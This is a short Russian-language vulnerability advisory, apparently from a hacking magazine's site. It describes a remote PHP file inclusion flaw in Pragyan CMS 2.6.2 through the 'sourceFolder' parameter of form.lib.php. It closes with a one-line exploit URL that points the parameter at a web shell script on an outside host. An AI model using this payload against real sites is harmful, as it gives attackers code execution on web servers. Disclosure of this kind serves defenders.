Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: Pragyan CMS 2.6.2
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «sourceFolder» сценарием form.lib.php. Удаленный
пользователь может выполнить произвольный PHP сценарий на целевой системе с
привилегиями Web сервера. Успешное эксплуатирование уязвимости требует включение
опции "register_globals" в конфигурационном файле PHP.
Эксплоит:
www.target.com/path/cms/modules/form.lib.php? sourceFolder=http://shell.own3r.by.ru/syn99.php?